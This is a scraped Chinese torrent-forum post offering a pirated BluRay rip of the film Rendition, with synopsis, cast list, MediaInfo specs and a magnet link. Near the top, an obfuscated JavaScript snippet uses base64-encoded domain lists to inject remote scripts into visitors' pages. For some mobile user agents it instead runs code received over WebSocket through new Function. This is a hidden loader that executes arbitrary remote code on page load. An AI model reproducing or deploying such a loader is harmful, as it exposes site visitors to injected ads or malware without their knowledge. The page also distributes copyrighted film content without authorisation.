反恐疑云[简繁字幕]Rendition.2007.1080p.BluRay.x264.DTS-迅雷下载 8.72GB

版主小s 14天前 213

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 反恐疑云 / 关键危机 / 引渡 / 引渡疑云 / 死亡引渡 / 移交
◎片  名 Rendition
◎年  代 2007
◎产  地 美国
◎类  别 剧情 / 惊悚 / 战争
◎语  言 英语
◎上映日期 2007-10-19
◎IMDb评分  6.8/10 from 53861 users
◎IMDb链接  https://www.imdb.com/title/tt0804522
◎豆瓣评分 7.1/10 from 6594 users
◎豆瓣链接 https://movie.douban.com/subject/2039711/
◎片  长 122 分钟
◎导  演 加文·胡德 Gavin Hood
◎编  剧 凯利·塞恩 Kelley Sane
◎主  演 瑞茜·威瑟斯彭 Reese Witherspoon
       杰克·吉伦哈尔 Jake Gyllenhaal
       梅丽尔·斯特里普 Meryl Streep
       阿拉米斯·奈特 Aramis Knight
       彼得·萨斯加德 Peter Sarsgaard
       艾伦·阿金 Alan Arkin
       艾格尔·纳尔 Igal Naor
       莫阿·库阿斯 Moa Khouas
       奥玛尔·梅特瓦利 Omar Metwally
       奇内布·乌凯什 Zineb Oukach
       伊莲·安妮·弗斯特 Elaine Anne Furst
       Levi Tinker
       西蒙·阿布卡瑞安 Simon Abkarian
       斯蒂夫·汤姆 Steve Tom
       Floella Benjamin
       玛丽娜·安德森 Marina Anderson
       Rosie Malek-Yonan
       Christian Martin
       Wendy Phillips
       J·K·西蒙斯 J.K. Simmons
       Michael Dube
       鲍勃·冈顿 Bob Gunton
       安妮·贝坦克特 Anne Betancourt


◎标  签 美国 | 政治 | 反恐 | 剧情 | JakeGyllenhaal | 悬疑 | 美国电影 | 2007

◎简  介  

  埃及裔美国人安瓦?艾尔?伊布拉西米(奥玛尔?梅特瓦利 饰)大约二十年前,从埃及移民到了美国,与漂亮的美国姑娘伊莎贝拉?菲尔兹(莉丝?维瑟斯彭 饰)成了家,夫妻恩爱生活美满,育有一子,伊莎贝拉肚子里的第二胎也日渐成型。某日,安瓦?艾尔?伊布拉西米从南非出差回来,在华盛顿机场被神秘的黑衣人带走,原因是中央情报局认为身为化学品工程师的安瓦?艾尔?伊布拉西米是恐怖分子,想从他口中撬出有用的情报。倒霉的安瓦被“引渡”至埃及的开罗,交由驻扎在当地的中情局探员道格拉斯?弗里曼(杰克?吉伦哈尔 饰)和老奸巨猾的当地探员审讯。另一方面,身怀六甲的伊莎贝拉,坚信丈夫是无辜的,四下奔走,努力寻找丈夫的下落。期间,她虽然幸运地获得旧情人(彼得?萨斯加德 饰)的帮助,但终究不足以国家强势机构对抗,一筹莫展。与此同时,刚刚入行不久的特工道格拉斯?弗里曼,在目睹了CIA同事们对安瓦进行的非人道审讯时,也面临着良心的拷问。安瓦是不是恐怖分子?伊莎贝拉能否和丈夫团圆?中情局新手道格拉斯?弗里曼,究竟在这场暗战中发挥了怎样的作用?对这一切疑问的解答,必将引向对“引渡”政策的重新审视。

  1. General
  2. Unique ID                                : 219367356064306853215063651731921800390 (0xA5089DB14B13791ACC6A0B2588A58CC6)
  3. Complete name                            : [email protected]
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 8.72 GiB
  7. Duration                                 : 2 h 2 min
  8. Overall bit rate                         : 10.2 Mb/s
  9. Encoded date                             : UTC 2021-07-18 11:57:13
  10. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 4 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 4 frames
  20. Codec ID                                 : V_MPEG4/ISO/AVC
  21. Duration                                 : 2 h 2 min
  22. Bit rate                                 : 8 636 kb/s
  23. Width                                    : 1 920 pixels
  24. Height                                   : 816 pixels
  25. Display aspect ratio                     : 2.35:1
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 23.976 (24000/1001/53354) FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Scan type                                : Progressive
  32. Bits/(Pixel*Frame)                       : 0.230
  33. Stream size                              : 7.38 GiB (85%)
  34. Writing library                          : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]
  35. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  36. Language                                 : English
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. ID in the original source medium         : 4352 (0x1100)
  42. Format                                   : DTS
  43. Format/Info                              : Digital Theater Systems
  44. Codec ID                                 : A_DTS
  45. Duration                                 : 2 h 2 min
  46. Bit rate mode                            : Constant
  47. Bit rate                                 : 1 509 kb/s
  48. Channel(s)                               : 6 channels
  49. Channel layout                           : C L R Ls Rs LFE
  50. Sampling rate                            : 48.0 kHz
  51. Frame rate                               : 93.750 FPS (512 SPF)
  52. Bit depth                                : 24 bits
  53. Compression mode                         : Lossy
  54. Stream size                              : 1.29 GiB (15%)
  55. Language                                 : English
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Original source medium                   : Blu-ray
  59. Text #1
  60. ID                                       : 3
  61. ID in the original source medium         : 4611 (0x1203)
  62. Format                                   : PGS
  63. Muxing mode                              : zlib
  64. Codec ID                                 : S_HDMV/PGS
  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  66. Duration                                 : 1 h 53 min
  67. Bit rate                                 : 29.1 kb/s
  68. Count of elements                        : 2081
  69. Stream size                              : 23.6 MiB (0%)
  70. Title                                    : 简英
  71. Language                                 : Chinese
  72. Default                                  : Yes
  73. Forced                                   : No
  74. Original source medium                   : Blu-ray
  75. Text #2
  76. ID                                       : 4
  77. ID in the original source medium         : 4612 (0x1204)
  78. Format                                   : PGS
  79. Muxing mode                              : zlib
  80. Codec ID                                 : S_HDMV/PGS
  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  82. Duration                                 : 1 h 53 min
  83. Bit rate                                 : 29.3 kb/s
  84. Count of elements                        : 2081
  85. Stream size                              : 23.7 MiB (0%)
  86. Title                                    : 繁英
  87. Language                                 : Chinese
  88. Default                                  : No
  89. Forced                                   : No
  90. Original source medium                   : Blu-ray
  91. Text #3
  92. ID                                       : 5
  93. ID in the original source medium         : 4613 (0x1205)
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 1 h 53 min
  99. Bit rate                                 : 17.9 kb/s
  100. Count of elements                        : 2081
  101. Stream size                              : 14.5 MiB (0%)
  102. Title                                    : 简中
  103. Language                                 : Chinese
  104. Default                                  : No
  105. Forced                                   : No
  106. Original source medium                   : Blu-ray
  107. Text #4
  108. ID                                       : 6
  109. ID in the original source medium         : 4614 (0x1206)
  110. Format                                   : PGS
  111. Muxing mode                              : zlib
  112. Codec ID                                 : S_HDMV/PGS
  113. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  114. Duration                                 : 1 h 53 min
  115. Bit rate                                 : 18.1 kb/s
  116. Count of elements                        : 2081
  117. Stream size                              : 14.7 MiB (0%)
  118. Title                                    : 繁中
  119. Language                                 : Chinese
  120. Default                                  : No
  121. Forced                                   : No
  122. Original source medium                   : Blu-ray
  123. Text #5
  124. ID                                       : 7
  125. ID in the original source medium         : 4609 (0x1201)
  126. Format                                   : PGS
  127. Muxing mode                              : zlib
  128. Codec ID                                 : S_HDMV/PGS
  129. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  130. Duration                                 : 1 h 52 min
  131. Bit rate                                 : 28.2 kb/s
  132. Count of elements                        : 3259
  133. Stream size                              : 22.7 MiB (0%)
  134. Title                                    : 英语
  135. Language                                 : English
  136. Default                                  : No
  137. Forced                                   : No
  138. Original source medium                   : Blu-ray
  139. Menu
  140. 00:00:00.000                             : 第 01 章
  141. 00:02:27.147                             : 第 02 章
  142. 00:09:56.929                             : 第 03 章
  143. 00:17:08.902                             : 第 04 章
  144. 00:23:06.468                             : 第 05 章
  145. 00:33:28.256                             : 第 06 章
  146. 00:39:51.972                             : 第 07 章
  147. 00:49:03.023                             : 第 08 章
  148. 00:56:47.612                             : 第 09 章
  149. 01:05:10.740                             : 第 10 章
  150. 01:08:47.414                             : 第 11 章
  151. 01:13:43.377                             : 第 12 章
  152. 01:19:17.753                             : 第 13 章
  153. 01:24:48.792                             : 第 14 章
  154. 01:32:31.295                             : 第 15 章
  155. 01:34:46.055                             : 第 16 章
  156. 01:42:29.434                             : 第 17 章
  157. 01:46:03.774                             : 第 18 章
  158. 01:49:24.849                             : 第 19 章
  159. 01:54:10.844                             : 第 20 章


TAGS 剧情 惊悚 战争

磁力链:
  • magnet:?xt=urn:btih:F85226E53BB7D49C1BE4CD23E1C13BC86796D1EB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回